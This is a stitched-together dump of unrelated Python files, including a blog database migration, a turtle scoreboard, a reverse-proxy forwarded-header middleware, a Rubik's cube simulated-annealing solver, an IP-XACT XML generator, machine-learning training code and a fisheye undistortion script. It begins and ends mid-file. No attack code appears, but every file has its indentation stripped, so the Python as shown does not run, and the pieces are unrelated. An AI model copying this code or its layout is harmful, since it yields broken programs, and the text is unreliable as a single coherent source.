category_id=blog.category_id,
user_id=blog.author_id,
**date(blog)) for blog in blogs])
print('upgrade tag_blog ...')
tag_blogs = session.execute('select * from tag_blog;')
db.engine.execute(tag_blog.insert(), [{
'tag_id': i.tags_id,
'blog_id': i.blogs_id
} for i in tag_blogs])
def upgrade_setval():
print('upgrade setval ...')
db.engine.execute("select setval('tag_id_seq',(select max(id) from tag))")
db.engine.execute(
"select setval('blog_id_seq',(select max(id) from blog))")
db.engine.execute(
"select setval('category_id_seq',(select max(id) from category))")
db.engine.execute(
"select setval('timeline_id_seq',(select max(id) from timeline))")
db.engine.execute(
"select setval('question_id_seq',(select max(id) from question))")
db.engine.execute(
"select setval('user_id_seq',(select max(id) from \"user\"))")
def upgrade_redis():
print("upgrade redis ...")
redis.rename("visited:article", "count:article:visited")
if __name__ == '__main__':
with app.app_context():
upgrade_user()
upgrade_blog()
upgrade_timeline()
upgrade_question()
upgrade_setval()
upgrade_redis()
|
from turtle import Turtle
from config import BORDER_HEIGHT
ALIGNMENT = 'center'
FONT = ("Arial",15,"normal")
class ScoreBoard(Turtle):
def __init__(self) -> None:
super().__init__()
self.score = 0
self.highScore = self.get_highscore()
self.color("white")
self.penup()
self.hideturtle()
self.goto(0,(BORDER_HEIGHT//2)-30)
self.update_scoreboard()
def update_scoreboard(self):
self.clear()
self.write(f'Score : {self.score} High Score : {self.highScore}',move=False,align=ALIGNMENT,font=FONT)
def reset(self):
if self.score > self.highScore:
self.highScore = self.score
self.set_highscore(self.highScore)
self.score = 0
self.update_scoreboard()
def game_over(self):
self.home()
self.write(f'GAME OVER',move=False,align=ALIGNMENT,font=FONT)
def increase_score(self):
self.score += 1
self.update_scoreboard()
def get_highscore(self,high_score=0):
with open('highscore_data.txt') as file:
contents = file.read()
return int(contents)
def set_highscore(self,high_score=0):
with open('highscore_data.txt',mode='w') as file:
file.write(f'{high_score}')
s = ScoreBoard()
ll = [s.get_highscore()]
print(type(ll[0]))
|
"""Middleware to handle forwarded data by a reverse proxy."""
from ipaddress import ip_address
import logging
from aiohttp.hdrs import X_FORWARDED_FOR, X_FORWARDED_HOST, X_FORWARDED_PROTO
from aiohttp.web import HTTPBadRequest, middleware
from homeassistant.core import callback
_LOGGER = logging.getLogger(__name__)
# mypy: allow-untyped-defs
@callback
def async_setup_forwarded(app, trusted_proxies):
"""Create forwarded middleware for the app.
Process IP addresses, proto and host information in the forwarded for headers.
`X-Forwarded-For: <client>, <proxy1>, <proxy2>`
e.g., `X-Forwarded-For: 203.0.113.195, 70.41.3.18, 150.172.238.178`
We go through the list from the right side, and skip all entries that are in our
trusted proxies list. The first non-trusted IP is used as the client IP. If all
items in the X-Forwarded-For are trusted, including the most left item (client),
the most left item is used. In the latter case, the client connection originated
from an IP that is also listed as a trusted proxy IP or network.
`X-Forwarded-Proto: <client>, <proxy1>, <proxy2>`
e.g., `X-Forwarded-Proto: https, http, http`
OR `X-Forwarded-Proto: https` (one entry, even with multiple proxies)
The X-Forwarded-Proto is determined based on the corresponding entry of the
X-Forwarded-For header that is used/chosen as the client IP. However,
some proxies, for example, Kubernetes NGINX ingress, only retain one element
in the X-Forwarded-Proto header. In that case, we'll just use what we have.
`X-Forwarded-Host: <host>`
e.g., `X-Forwarded-Host: example.com`
If the previous headers are processed successfully, and the X-Forwarded-Host is
present, it will be used.
Additionally:
- If no X-Forwarded-For header is found, the processing of all headers is skipped.
- Log a warning when untrusted connected peer provides X-Forwarded-For headers.
- If multiple instances of X-Forwarded-For, X-Forwarded-Proto or
X-Forwarded-Host are found, an HTTP 400 status code is thrown.
- If malformed or invalid (IP) data in X-Forwarded-For header is found,
an HTTP 400 status code is thrown.
- The connected client peer on the socket of the incoming connection,
must be trusted for any processing to take place.
- If the number of elements in X-Forwarded-Proto does not equal 1 or
is equal to the number of elements in X-Forwarded-For, an HTTP 400
status code is thrown.
- If an empty X-Forwarded-Host is provided, an HTTP 400 status code is thrown.
- If an empty X-Forwarded-Proto is provided, or an empty element in the list,
an HTTP 400 status code is thrown.
"""
@middleware
async def forwarded_middleware(request, handler):
"""Process forwarded data by a reverse proxy."""
overrides = {}
# Handle X-Forwarded-For
forwarded_for_headers = request.headers.getall(X_FORWARDED_FOR, [])
if not forwarded_for_headers:
# No forwarding headers, continue as normal
return await handler(request)
# Ensure the IP of the connected peer is trusted
connected_ip = ip_address(request.transport.get_extra_info("peername")[0])
if not any(connected_ip in trusted_proxy for trusted_proxy in trusted_proxies):
_LOGGER.warning(
"Received X-Forwarded-For header from untrusted proxy %s, headers not processed",
connected_ip,
)
# Not trusted, continue as normal
return await handler(request)
# Multiple X-Forwarded-For headers
if len(forwarded_for_headers) > 1:
_LOGGER.error(
"Too many headers for X-Forwarded-For: %s", forwarded_for_headers
)
raise HTTPBadRequest
# Process X-Forwarded-For from the right side (by reversing the list)
forwarded_for_split = list(reversed(forwarded_for_headers[0].split(",")))
try:
forwarded_for = [ip_address(addr.strip()) for addr in forwarded_for_split]
except ValueError:
_LOGGER.error(
"Invalid IP address in X-Forwarded-For: %s", forwarded_for_headers[0]
)
raise HTTPBadRequest
# Find the last trusted index in the X-Forwarded-For list
forwarded_for_index = 0
for forwarded_ip in forwarded_for:
if any(forwarded_ip in trusted_proxy for trusted_proxy in trusted_proxies):
forwarded_for_index += 1
continue
overrides["remote"] = str(forwarded_ip)
break
else:
# If all the IP addresses are from trusted networks, take the left-most.
forwarded_for_index = -1
overrides["remote"] = str(forwarded_for[-1])
# Handle X-Forwarded-Proto
forwarded_proto_headers = request.headers.getall(X_FORWARDED_PROTO, [])
if forwarded_proto_headers:
if len(forwarded_proto_headers) > 1:
_LOGGER.error(
"Too many headers for X-Forward-Proto: %s", forwarded_proto_headers
)
raise HTTPBadRequest
forwarded_proto_split = list(
reversed(forwarded_proto_headers[0].split(","))
)
forwarded_proto = [proto.strip() for proto in forwarded_proto_split]
# Catch empty values
if "" in forwarded_proto:
_LOGGER.error(
"Empty item received in X-Forward-Proto header: %s",
forwarded_proto_headers[0],
)
raise HTTPBadRequest
# The X-Forwarded-Proto contains either one element, or the equals number
# of elements as X-Forwarded-For
if len(forwarded_proto) not in (1, len(forwarded_for)):
_LOGGER.error(
"Incorrect number of elements in X-Forward-Proto. Expected 1 or %d, got %d: %s",
len(forwarded_for),
len(forwarded_proto),
forwarded_proto_headers[0],
)
raise HTTPBadRequest
# Ideally this should take the scheme corresponding to the entry
# in X-Forwarded-For that was chosen, but some proxies only retain
# one element. In that case, use what we have.
overrides["scheme"] = forwarded_proto[-1]
if len(forwarded_proto) != 1:
overrides["scheme"] = forwarded_proto[forwarded_for_index]
# Handle X-Forwarded-Host
forwarded_host_headers = request.headers.getall(X_FORWARDED_HOST, [])
if forwarded_host_headers:
# Multiple X-Forwarded-Host headers
if len(forwarded_host_headers) > 1:
_LOGGER.error(
"Too many headers for X-Forwarded-Host: %s", forwarded_host_headers
)
raise HTTPBadRequest
forwarded_host = forwarded_host_headers[0].strip()
if not forwarded_host:
_LOGGER.error("Empty value received in X-Forward-Host header")
raise HTTPBadRequest
overrides["host"] = forwarded_host
# Done, create a new request based on gathered data.
request = request.clone(**overrides)
return await handler(request)
app.middlewares.append(forwarded_middleware)
|
#!/usr/bin/env python
###############################################################################
#
# pairwise2matrix.py - convert list of pairwise scores to distance matrix
#
# File: pairwise2matrix.py
# Author: Alex Stivala
# Created: September 2008
#
#
# Given list of pairwise scores from qptabmatch_allpairs.py output,
# convert to distance matrix by reformatting as matrix and normalizing.
#
# Usage:
# pairwise2matrix.py db_directory < scoresfile > matrixfile
#
# Input is from stdin, tab-delimited in the format
#
# pdbid1 pdbid2 score
#
# Also reads .tableuxdistmatrix files from db_directory, as used by
# qptabmatch_allpairs.py, to get orders of tableaux (number of SSEs)
# require for normalization.
#
# Output is to stdout, a (square symmetric) matrix of normalized scores
# between each structure. It is in format suitable for reading in R with
# read.table(filename, header=TRUE)
# i.e. the first line is space-delimited identifiers for each column,
# then the matrix (space delimited)
#
# Requires Numeric library (builds Numeric.array)
#
# $Id: pairwise2matrix.py 2703 2009-07-27 06:01:05Z astivala $
#
###############################################################################
import sys,os,glob
import numpy.oldnumeric as Numeric
from norms import norm1,norm2,norm3
def usage(progname):
"""
Print usage message and exit
"""
sys.stderr.write("Usage: " + progname + " <db_directory>\n")
sys.exit(1)
def main():
"""
main for pairwise2matrix.py
"""
if len(sys.argv) != 2:
usage(os.path.basename(sys.argv[0]))
db_directory = sys.argv[1]
# get numbers of SSEs from .tableauxdistmatrix files in db_diurectory
# build dict of {name : size}
size_dict = {}
input_list = glob.glob(os.path.join(db_directory, '*.tableaudistmatrix'))
for dbfile in input_list:
idline = open(dbfile).readline()
qid = idline[:8].lstrip().rstrip()
qsize = int(idline[8:])
size_dict[qid] = qsize
scoredict = {}
for line in sys.stdin:
if line[0] == '#':
continue
s = line.split('\t')
scoredict[(s[0],s[1])] = float(s[2])
# get list of unique names (identifiers)
allnames = [k[0] for k in scoredict.keys() ] + \
[k[1] for k in scoredict.keys() ]
namedict = {}
for name in allnames:
namedict[name] = name
names = namedict.values()
n = len(names)
assert(len(scoredict) == n*(n-1)/2) # n(n-1)/2 comparisons for n things
# build dictionary mapping identfieres (names) to indicies for matrix
idict = dict([(b,a) for (a,b) in enumerate(names)])
# build the distance matrix
distmatrix = Numeric.zeros((n,n),'d')
for ((name1,name2),score) in scoredict.iteritems():
i = idict[name1]
j = idict[name2]
normscore = norm3(score, size_dict[name1], size_dict[name2])
distmatrix[i,j] = normscore
distmatrix[j,i] = normscore
namestr = reduce(lambda a,b : a+' '+b, names)
print namestr
for i in xrange(n):
for j in xrange(n):
sys.stdout.write('%.4f ' % distmatrix[i,j])
sys.stdout.write('\n')
if __name__ == "__main__":
main()
|
#/**
# *\file Simulated_Annealing.py
# *\brief This code contains the simulated annealing algorithm implemented
# * to solve the Assignment 2, group project, rubix cube problem
# * - Solves both n=2, n=3 cubes
# * - Utilises calculate_cost() function based on number of missplaced cube element faces
# * - Utilises a mixture of Annealing and Tempering to obtain a solved cube state
# *\Note - Cost value has a maximum and minimum and is descret for our purposes, resulting in many delta=0
# *\Author F.OSuibhne
# *\Version V1.1
# *\Date 10-04-21
# */
from rubiks_cube import RubiksCube
#from solve_random_cubes import random_cube, run #< Dont beleive run is used anymore
import time
#import numpy as np
import random
import math
from copy import deepcopy
def Simulated_Annealing():
start = time.time() #< Timer activated for runtime
T_0 = 35 #< Starting Temperature, n=2 Temp= 2.86 / in theory: n=3 Temp= 35 see STD_cost() below
Temp = T_0
Cooling_Rate = .99 #< Determines how fast algorithm completes (longer more likley to obtain goal)
# should be a positive value, between 0-1 Ideally should be considered with the max temperature
# and probability value, if too high much time is wasted, too low and local minimum are not avoided
Current_State = RubiksCube(n=3, randomize = True) #< Call for new random rubix cube state of size nxnxn
print("Cube Start State\n",Current_State.cube, "\n\n\n") #< Dont remove without uncommenting line 32
#Current_State.cube
print("Initial Cube of cost = ", Current_State.calculate_cost())
N_Moves = 0 #< Initialise counter, no. of accepted moves to reach goal
MKV_Chain_Count = 0 #< Initialise counter, consecutive itterations without improvement
Current_Best_State = deepcopy(Current_State) #< Initialise
Best_Cost = Current_Best_State.calculate_cost() #< Initialise
Initial_Best_Cost = deepcopy(Best_Cost) #< Retaining copy of initial state
#________ Checks for Unmixed Cube ___________
if Current_State.is_solved()==True: #Checks for goal state
print("Failure: Initialised random state is alread goal") #< Failure because algorithm didnt do anything
return Current_State
while Temp > .001: #< Set final Temperature ~0, cant be 0 (Temp = Temp*Cooling_Rate) wouldn't solve
MKV_Chain = 0 #< Reset counter
while MKV_Chain < 20: #< length of each markov chain, (I think should be 18^2, confused on formula)
#_________ Make & Evaluate Move ________
Next_State = deepcopy(Current_State)
Next_State.apply_move(Next_State.get_random_move()) #Apply_Random_Move(Current_State) # Get 1 of 18 random next moves, apply and obtain the state
Current_Cost = Current_State.calculate_cost()
Next_Cost = Next_State.calculate_cost()
Delta_Cost = Next_Cost - Current_Cost #< Calculate gain or loss of accepting move
# Goal is cost reduction smaller cost is better
# delta would be negative if Next is desirable
#_________ Checks for Goal State __________
if Next_State.is_solved() == True: #< Accepts if at final goal state
Current_Best_State = deepcopy(Next_State)
duration = time.time() - start #< Calculate run time
print("Goal state reached after", N_Moves, " Moves after ", duration, " seconds")
return Current_Best_State.cube #< Returns whole goal state cube
#__________ Annealing Steps ____________
if Delta_Cost < 0: #< If improvment always accept next state
#< NOTE: very discrete cost values mean delta of 0 is common
# this poses an issue with the probability calculation later
Current_State = deepcopy(Next_State)
N_Moves=N_Moves+1
else:
if Delta_Cost == 0:
Delta_Cost = .1
probability = math.exp(-(Delta_Cost/Temp)) #< A value between 0-1, approaches 1 as T increases
rando = random.uniform(0,1)
if probability > rando: #< Accepts non-benificial actions based on probability, as Temp
# Decreases probability of acceptance must reduce
Current_State = deepcopy(Next_State)
N_Moves=N_Moves+1
#___________ Save Record _____________
if Best_Cost > Current_Cost: #< If new record, save updated state info
Current_Best_State = deepcopy(Current_State)
Best_Cost = Current_Cost
MKV_Chain = MKV_Chain+1 #< Counter
Temp = Temp*Cooling_Rate #< Itterativly decrementing temperature
#__________ Tempering Steps __________
if Best_Cost == Initial_Best_Cost:
MKV_Chain_Count = MKV_Chain_Count+1 #< Counter for non-improvemet
else:
Initial_Best_Cost = Best_Cost
MKV_Chain_Count = 0 #< Reset counter
if MKV_Chain_Count == 20: #< if no improvment for fixed no. of itterations
Temp = 2.86 #< Reset annealing temperature
MKV_Chain_Count = 0
duration = time.time() - start #< Calculate run time
print("Failed to reach goal state, Best cost obtained was", Best_Cost)
print("State reached after", N_Moves, " Moves after ", duration, " seconds")
return(Current_Best_State.cube) #< Returns Non-Goal final state
print(Simulated_Annealing())
#__________ Utilised to calculate a mean and std individually _________
def STD_cost():
x=0
Total=0
sum=0
while x<200:
Current_State = RubiksCube(n=3, randomize = True)
Cost = Current_State.calculate_cost()
#Total = Total+Cost
sum = sum + (Cost-25.3)*(Cost-25.3)
x=x+1
#mean = Total/200
sigma= math.sqrt(sum/200)
return (sigma)
#_Resulting std used for
#for n=2x2x2 cube, mean = 25.99, sigma = 2.684
#for n=3x3x3 cube, mean = 59.41, sigma = 35.09
#print(STD_cost())
|
from rest_framework_extensions.routers import ExtendedSimpleRouter
from .views import PostViewset
router = ExtendedSimpleRouter()
router.register(r'posts', PostViewset, base_name='posts')
urlpatterns = router.urls
|
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
# =============================================================================
# ___ ______ __ _ ____ _____
# _ __ _ _|_ _| _ \ \/ / / \ / ___|_ _|
# | '_ \| | | || || |_) \ / / _ \| | | |
# | |_) | |_| || || __// \ / ___ \ |___ | |
# | .__/ \__, |___|_| /_/\_\/_/ \_\____| |_|
# |_| |___/
# =============================================================================
# Authors: Patrick Lehmann
#
# Python module: A DOM based IP-XACT implementation for Python
#
# Description:
# ------------------------------------
# TODO:
#
# License:
# ==============================================================================
# Copyright 2007-2016 Patrick Lehmann - Dresden, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
from textwrap import dedent
from pyIPXACT import RootElement, __DEFAULT_SCHEMA__
class Component(RootElement):
"""Represents an IP-XACT components."""
def __init__(self, vlnv, description):
super().__init__(vlnv)
self._description = description
self._busInterfaces = []
self._indirectInterfaces = []
self._channels = []
self._remapStates = []
self._addressSpaces = []
self._memoryMaps = []
self._model = None
self._componentGenerators = []
self._choices = []
self._fileSets = []
self._whiteboxElements = []
self._cpus = []
self._otherClockDrivers = []
self._resetTypes = []
self._parameters = []
self._assertions = []
def Settem(self, item):
if isinstance(item, Model): self._model = item
else:
raise ValueError()
def AddItem(self, item):
if isinstance(item, BusInterface): self._busInterfaces.append(item)
elif isinstance(item, IndirectInterface): self._indirectInterfaces.append(item)
elif isinstance(item, Channel): self._channels.append(item)
elif isinstance(item, RemapState): self._remapStates.append(item)
elif isinstance(item, AddressSpace): self._addressSpaces.append(item)
elif isinstance(item, MemoryMap): self._memoryMaps.append(item)
elif isinstance(item, ComponentGenerator): self._componentGenerators.append(item)
elif isinstance(item, Choice): self._choices.append(item)
elif isinstance(item, FileSet): self._fileSets.append(item)
elif isinstance(item, WhiteboxElement): self._whiteboxElements.append(item)
elif isinstance(item, Cpu): self._cpus.append(item)
elif isinstance(item, OtherClockDriver): self._otherClockDrivers.append(item)
elif isinstance(item, ResetType): self._resetTypes.append(item)
elif isinstance(item, Parameter): self._parameters.append(item)
elif isinstance(item, Assertion): self._assertions.append(item)
else:
raise ValueError()
def ToXml(self):
"""Converts the object's data into XML format."""
buffer = dedent("""\
<?xml version="1.0" encoding="UTF-8"?>
<{xmlns}:component
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:{xmlns}="{schemaUri}"
xsi:schemaLocation="{schemaUri} {schemaUrl}">
{versionedIdentifier}
<{xmlns}:description>{description}</{xmlns}:description>
""").format(
xmlns=__DEFAULT_SCHEMA__.NamespacePrefix,
schemaUri=__DEFAULT_SCHEMA__.SchemaUri,
schemaUrl=__DEFAULT_SCHEMA__.SchemaUrl,
versionedIdentifier=self._vlnv.ToXml(isVersionedIdentifier=True),
description=self._description
)
if self._busInterfaces:
buffer += "\t<{xmlns}:busInterfaces>\n"
for busInterface in self._busInterfaces:
buffer += busInterface.ToXml(2)
buffer += "\t</{xmlns}:busInterfaces>\n"
if self._indirectInterfaces:
buffer += "\t<{xmlns}:indirectInterfaces>\n"
for indirectInterface in self._indirectInterfaces:
buffer += indirectInterface.ToXml(2)
buffer += "\t</{xmlns}:indirectInterfaces>\n"
if self._channels:
buffer += "\t<{xmlns}:channels>\n"
for channel in self._channels:
buffer += channel.ToXml(2)
buffer += "\t</{xmlns}:channels>\n"
if self._remapStates:
buffer += "\t<{xmlns}:remapStates>\n"
for remapState in self._remapStates:
buffer += remapState.ToXml(2)
buffer += "\t</{xmlns}:remapStates>\n"
if self._addressSpaces:
buffer += "\t<{xmlns}:addressSpaces>\n"
for addressSpace in self._addressSpaces:
buffer += addressSpace.ToXml(2)
buffer += "\t</{xmlns}:addressSpaces>\n"
if self._memoryMaps:
buffer += "\t<{xmlns}:memoryMaps>\n"
for memoryMap in self._memoryMaps:
buffer += memoryMap.ToXml(2)
buffer += "\t</{xmlns}:memoryMaps>\n"
if self._model:
buffer += "\t<{xmlns}:model>\n"
buffer += self._model.ToXml(2)
buffer += "\t</{xmlns}:model>\n"
if self._componentGenerators:
buffer += "\t<{xmlns}:componentGenerators>\n"
for componentGenerator in self._componentGenerators:
buffer += componentGenerator.ToXml(2)
buffer += "\t</{xmlns}:componentGenerators>\n"
if self._choices:
buffer += "\t<{xmlns}:choices>\n"
for choice in self._choices:
buffer += choice.ToXml(2)
buffer += "\t</{xmlns}:choices>\n"
if self._fileSets:
buffer += "\t<{xmlns}:fileSets>\n"
for fileSet in self._fileSets:
buffer += fileSet.ToXml(2)
buffer += "\t</{xmlns}:fileSets>\n"
if self._whiteboxElements:
buffer += "\t<{xmlns}:whiteboxElements>\n"
for whiteboxElement in self._whiteboxElements:
buffer += whiteboxElement.ToXml(2)
buffer += "\t</{xmlns}:whiteboxElements>\n"
if self._cpus:
buffer += "\t<{xmlns}:cpus>\n"
for cpu in self._cpus:
buffer += cpu.ToXml(2)
buffer += "\t</{xmlns}:cpus>\n"
if self._otherClockDrivers:
buffer += "\t<{xmlns}:otherClockDrivers>\n"
for otherClockDriver in self._otherClockDrivers:
buffer += otherClockDriver.ToXml(2)
buffer += "\t</{xmlns}:otherClockDrivers>\n"
if self._resetTypes:
buffer += "\t<{xmlns}:resetTypes>\n"
for resetType in self._resetTypes:
buffer += resetType.ToXml(2)
buffer += "\t</{xmlns}:resetTypes>\n"
if self._parameters:
buffer += "\t<{xmlns}:parameters>\n"
for parameter in self._parameters:
buffer += parameter.ToXml(2)
buffer += "\t</{xmlns}:parameters>\n"
if self._assertions:
buffer += "\t<{xmlns}:assertions>\n"
for assertion in self._assertions:
buffer += assertion.ToXml(2)
buffer += "\t</{xmlns}:assertions>\n"
buffer += dedent("""\
</{xmlns}:component>
""")
return buffer.format(xmlns=__DEFAULT_SCHEMA__.NamespacePrefix)
class BusInterface:
"""Represents an IP-XACT bus interface."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class IndirectInterface:
"""Represents an IP-XACT indirect interface."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Channel:
"""Represents an IP-XACT channel."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class RemapState:
"""Represents an IP-XACT remap state."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class AddressSpace:
"""Represents an IP-XACT address space."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class MemoryMap:
"""Represents an IP-XACT memory map."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Model:
"""Represents an IP-XACT model."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class ComponentGenerator:
"""Represents an IP-XACT component generator."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Choice:
"""Represents an IP-XACT choice."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class FileSet:
"""Represents an IP-XACT fileset."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class WhiteboxElement:
"""Represents an IP-XACT whitebos element."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Cpu:
"""Represents an IP-XACT cpu."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class OtherClockDriver:
"""Represents an IP-XACT *other* clock driver."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class ResetType:
"""Represents an IP-XACT reset type."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Parameter:
"""Represents an IP-XACT parameter."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
class Assertion:
"""Represents an IP-XACT assertion."""
def __init__(self):
pass
def ToXml(self, indent=0):
"""Converts the object's data into XML format."""
return ""
|
from django.test import TestCase
# Create your tests here.
from django.test import TestCase
from django.contrib.auth.models import User
from .models import Profile
class ProfileTestClass(TestCase):
'''
test class for Profile model
'''
def setUp(self):
self.user = User.objects.create_user("testuser", "secret")
self.profile_test = Profile(image='https://ucarecdn.com/620ac26e-19f7-4c0a-86d1-2b4e4b195fa8/-/crop/610x452/15,0/-/preview/',
bio="this is a test bio",
owner=self.user)
self.profile_test.save()
def test_instance_true(self):
self.profile_test.save()
self.assertTrue(isinstance(self.profile_test, Profile))
|
from sklearn import svm
import visualization
from sklearn.linear_model import LogisticRegression
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix, classification_report
import pickle
from sklearn.svm import SVC
from xgboost import XGBClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import make_scorer, f1_score
import xgboost as xgb
# Shuffle and split the dataset into training and testing set.
X_all = visualization.X_all
y_all = visualization.y_all
X_train, X_test, y_train, y_test = train_test_split(X_all, y_all,
test_size = 0.3,
random_state = 2,
stratify = y_all)
# Fitting Logistic Regression to the Training set
regression = LogisticRegression(random_state = 0)
regression.fit(X_train, y_train)
# #Comment out to Show confusion matrix of Logistic Regression
# Y_pred = regression.predict(X_test)
# cm_regression = confusion_matrix(y_test, Y_pred)
# print(classification_report(y_test, Y_pred))
# sns.heatmap(cm_regression, annot=True,fmt='d')
# plt.show(block=True)
#Fitting the SVM to the training set
svm_model = SVC(kernel = 'rbf',random_state = 0)
svm_model.fit(X_train, y_train)
# #Comment out to Show confusion matrix of SVM
# Y_pred = svm_model.predict(X_test)
# cm_svm = confusion_matrix(y_test, Y_pred)
# sns.heatmap(cm_svm, annot=True, fmt='d')
# plt.show(block=True)
#Fitting XGBoost to the Training set
xgboostmodel = XGBClassifier(seed=82)
xgboostmodel.fit(X_train, y_train)
# #Comment out to Show confusion matrix of XGBoost
# Y_pred = xgboostmodel.predict(X_test)
# cm_xgboost = confusion_matrix(y_test, Y_pred)
# sns.heatmap(cm_xgboost, annot=True,fmt='d')
# plt.show(block=True)
#Tuning of XGBoost
parameters = { 'learning_rate' : [0.1],
'n_estimators' : [40],
'max_depth': [3],
'min_child_weight': [3],
'gamma':[0.4],
'subsample' : [0.8],
'colsample_bytree' : [0.8],
'scale_pos_weight' : [1],
'reg_alpha':[1e-5]
}
def predict_labels(clf, features, target):
''' Makes predictions using a fit classifier based on F1 score. '''
y_pred = clf.predict(features)
return f1_score(target, y_pred, pos_label='H'), sum(target == y_pred) / float(len(y_pred))
# TODO: Initialize the classifier
clf = xgb.XGBClassifier(seed=2)
# TODO: Make an f1 scoring function using 'make_scorer'
f1_scorer = make_scorer(f1_score,pos_label='H')
# TODO: Perform grid search on the classifier using the f1_scorer as the scoring method
grid_obj = GridSearchCV(clf,
scoring=f1_scorer,
param_grid=parameters,
cv=5)
# TODO: Fit the grid search object to the training data and find the optimal parameters
grid_obj = grid_obj.fit(X_train,y_train)
# Get the estimator
clf = grid_obj.best_estimator_
print(clf)
# Report the final F1 score for training and testing after parameter tuning
f1, acc = predict_labels(clf, X_train, y_train)
print( "F1 score and accuracy score for training set: {:.4f} , {:.4f}.".format(f1 , acc))
f1, acc = predict_labels(clf, X_test, y_test)
print("F1 score and accuracy score for test set: {:.4f} , {:.4f}.".format(f1 , acc))
#Getting models outside by pickle
pickle.dump(regression, open('regression_model','wb'))
pickle.dump(svm_model, open('svm_model','wb'))
pickle.dump(xgboostmodel, open('xgboostmodel','wb'))
pickle.dump(clf, open('tunedmodel','wb'))
|
import pandas as pd
import math
import numpy as np
import cv2
import argparse
from glob import glob
from itertools import chain
import os
CORRECTW = 1350
CORRECTH = 720
SIDE_DISTANCE = 8000
FRONT_DISTANCE = 6000
REAR_DISTANCE = 8000
W_OFFSET = 50
VEHICLE_L = 5023
VEHICLE_W = 1960
HALF_VEHICLE_L = VEHICLE_L / 2
HALF_VEHICLE_W = VEHICLE_W / 2
AVM_PIXEL_SIZE = 15 # 15mm
# -----------------------distortion table--------------
file_name = "4066_distortion.xls"
xl_file = pd.ExcelFile(file_name)
dfs = {
sheet_name: xl_file.parse(sheet_name)
for sheet_name in xl_file.sheet_names
}
# print(dfs)
distortion = dfs['distortion'].values
ref_table = distortion[:900, 1]
real_table = distortion[:900, 2]
dist_table = distortion[:900, 3] * 0.01
def binary_search(arr, l, r, x):
while l < r:
mid = (l + r) // 2
if x > arr[mid]:
l = mid + 1
else:
r = mid
return r
def find_real_r(ref_r):
idx = binary_search(ref_table, 0, len(ref_table) - 1, ref_r)
left_ref = ref_table[idx - 1]
right_ref = ref_table[idx]
ratio = (ref_r - left_ref) / (right_ref - left_ref)
left_dist = dist_table[idx - 1]
right_dist = dist_table[idx]
target_dist = (right_dist - left_dist) * ratio + left_dist
return ref_r * (1 + target_dist)
def fisheye_undistort_lut(img_size, new_pixel_size):
# "fish eye distortion"
f = 1.29
pixel_size = 0.0042
new_pixel_size = new_pixel_size
height_in, width_in = img_size
width_out = CORRECTW
height_out = CORRECTH
lut_out = np.zeros((height_out, width_out, 2), dtype=np.float32)
for i in range(width_out):
for j in range(height_out):
#offset to center
x = i - width_out / 2 + 0.5
y = j - height_out / 2 + 0.5
r = math.sqrt(x * x + y * y) # image height
ref_r = r * new_pixel_size
real_r = find_real_r(ref_r)
origin_r = real_r / pixel_size
# print(ref_r, real_r)
if ref_r < 0.00001:
k = 1
else:
k = origin_r / r
src_x = x * k
src_y = y * k
# theta = math.atan2(src_x * pixel_size, f)
# src_x = f * theta
# src_y = src_y * math.cos(theta)
src_x = src_x + width_in / 2
src_y = src_y + height_in / 2
if src_x >= 0 and src_x < width_in and src_y >= 0 and src_y < height_in:
lut_out[j, i] = (src_x, src_y)
return lut_out
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-i",
"--input_dir",
default="avm",
help="input images dir")
parser.add_argument("-o",
"--output_dir",
default=".",
help="output images dir")
args = parser.parse_args()
img_ends = [".bmp", ".jpg", ".png"]
imgs_lits = list(
chain(*[glob(args.input_dir + "/*" + img_end)
for img_end in img_ends]))
for i, img_path in enumerate(imgs_lits):
img = cv2.imread(img_path)
if i == 0:
f = 1.29
# new_pixel_size = 0.00975 # 9.75um
new_pixel_size = 0.0042 # 4.2um
height_in, width_in, _ = img.shape
lut_undist = fisheye_undistort_lut((height_in, width_in),
new_pixel_size)
undist_img = cv2.remap(img, lut_undist, None, cv2.INTER_LINEAR)
img_name = os.path.basename(img_path)
cv2.imwrite(args.output_dir + "/" + img_name, undist_img)
|
import pytest
LV_BASIC_TOKENIZATION_TESTS = [
(
"Nevienu nedrīkst spīdzināt vai cietsirdīgi vai pazemojoši ar viņu "
"apieties vai sodīt.",
[
"Nevienu",
"nedrīkst",
"spīdzināt",
"vai",
"cietsirdīgi",
"vai",
"pazemojoši",
